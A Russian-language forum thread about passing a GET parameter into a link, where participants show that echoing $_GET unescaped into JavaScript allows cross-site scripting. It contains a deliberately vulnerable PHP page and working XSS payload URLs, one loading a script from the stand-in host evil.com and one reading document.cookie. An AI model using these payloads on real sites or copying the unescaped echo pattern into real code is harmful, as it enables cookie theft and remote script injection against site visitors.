Получить get переменную и добавить её в другой ссылке

[mta88]

//http://site.com/?var=1;alert(123);alert(456)
var myVar = <?=$_GET['var']?>

да, да, я что-то такое хотел, но настоящее, чтобы не разрушить зараженный объект и выполнить дополнительный код

получилось вот так

// xss.php
<!doctype html>
<html>
<head>
  <script>
    window.onload = function() {
      var obj = {
        url: 'getdata.php?var=<?php echo $_GET["var"]; ?>'
      }
    }
  </script>
</head>

<body></body>
</html>

а вот вредный url:

xss.php?var=12%27,%20t1:%20%28function%28%29{var%20s=document.createElement%28%27script%27%29;s.type=%22text/javascript%22;s.src=%22http://evil.com/script.js%22;document.body.appendChild%28s%29}%29%28%29,%20t2:%27

или так

xss.php?var=12', t1: (function(){var s=document.createElement('script');s.type="text/javascript";s.src="http://evil.com/script.js";document.body.appendChild(s)})(), t2:'

хотя это уже оффтоп конечно

[ruslan_mart]

animhotep, и то.

//http://site.com/?var=1';alert(document.cookie);'

url: 'getdata.php?var=<?=$_GET['var']?>';

[animhotep]

Сообщение от Ruslan_xDD

и то.

url:'getdata.php?var=1';alert(document.cookie);'

mta88, спасибо, понял. это работает

[greencard]

К сожалению методы не работают.

P.s. Данный скрипт находится в html файле, а не в js


Нашел решение, изменил html на php Всем спасибо.